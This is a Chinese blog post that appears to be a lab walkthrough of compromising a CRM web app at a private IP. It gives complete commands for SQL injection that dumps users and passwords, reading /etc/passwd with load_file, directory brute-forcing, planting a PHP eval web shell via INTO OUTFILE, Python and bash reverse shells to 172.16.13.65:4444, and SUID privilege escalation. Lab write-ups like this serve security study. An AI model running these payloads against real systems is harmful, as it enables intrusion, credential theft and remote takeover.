kizumi_header_banner_img

这里是幻灬十一的博客,欢迎来到我的世界

加载中

文章导读

0605-vb-02


avatar
11 2026年6月11日 11

1.尝试注入,未报错

命令:1′ or 1=1 —

2.查询有几个字段数

命令:1′ ORDER BY 4–+

尝试发现3未报错,4会报错,可以推断一共有三个字段。

3.显示当前数据库名

命令:1′ UNION SELECT 1,2,3,                                1′ UNION SELECT 1,database(),3,

使用联合查询查询用database()显示当前数据库名yxcrm

4.显示yxcrm库里所有表名

命令:1′ UNION SELECT 1,table_name,3 FROM information_schema.tables WHERE table_schema=’yxcrm’ —

可以发现有两张表,使用table表名,如果显示不全可以加group_concat

5.显示users表里所有字段名

命令:1′ UNION SELECT 1,column_name,3 FROM information_schema.columns WHERE table_name=’users’–

可以发现有4个字段,使用column字段名,如果显示不全可以加group_concat

6.显示内容

0′ OULON SELECT 1,concat(id,”=”,usemame,”=”,password,”=”,role),3 From users–

查询出管理员密码登录它,我使用了concat来进行拼接,0′ UNION SELECT 1,username,3 FROM users– + 也可以这样一个个查询

7,查询passwd,shadow文件内容

命令:1′ union select 1,load_file(‘/etc/passwd’),3–

使用函数load_file读取passwd,shawod。 只有passwd可以查询,同时发现除了root以外还一个labadmin(好像没什么用)

8.爆破目录

命令:根目录gobuster dir -u http://10.10.1.40 -w /usr/share/wordlists/dirb/common.txt -x php,txt,inc,bak,sql -t 50 -o inodes-ext-scan.txt

可以发现几个301的目录 挨个爆破接着试/assets/     /includes/    /uploads/

命令:gobuster dir -u http://10.10.1.40/includes -w /usr/share/wordlists/dirb/common.txt -x php,txt,inc,bak,sql -t 50 -o inodes-ext-scan.txt

只有includes 里面发现了有价值的文件db.php   layout.php

9.查看这两个文件

命令:1′ union select 1,load_file(‘/var/www/html/includes/db.php’),3–

在文件db,php里有一个提升可以用into outfole函数来进行写入,layout.php文件里写的CRM 系统公共头尾封装函数没什么可利用的价值

10.尝试写入一句话木马

命令:写入1′ union select 1,'<?php @eval($_POST[‘cmd’]);?>’,3 into outfile ‘/var/www/html/uploads/222.php’ —

命令:查看1′ union select 1,load_file(/var/www/html/uploads/222.php’),3 —

我这里选择的文件是uploads,写入的时候会显示报错,查看的时候是显示有这个文件的内容的

测试发现 ‘写入的文件可以爆破出来, 1’的文件不能爆破出来。推测是因为 ‘文件里写入的时候有附加内容,1’写入只有一句话木马导致爆破的时候识别不了

11.进行反弹连接

命令kali一:nc -lvn 4444

命令kali二:curl -X POST http://10.10.1.40/uploads/222.php -d “cmd=system(‘python3 -c \”import socket,os,pty;s=socket.socket();s.connect((\\\”172.16.13.65\\\”,4444));[os.dup2(s.fileno(),f) for f in (0,1,2)];pty.spawn(\\\”/bin/sh\\\”)\”‘);”

12.查看suid权限文件

  1. pwd—-查看当前文件路径
  2. find/ -perm -u+s -type -ls 2>/dev/null

13.提权

命令:/usr/local/bin/sysbash  -p

多次尝试 发现要加-p

14.额外内容

木马<?php echo exec($_POST[“cmd”]); ?>

连接命令curl -X POST http://10.10.1.40/uploads/cmd.php -d “cmd=bash -c ‘bash -i >%26 /dev/tcp/172.16.13.65/4444 0>%261′”



评论(0)

查看评论列表

暂无评论


发表评论

表情 颜文字
插入代码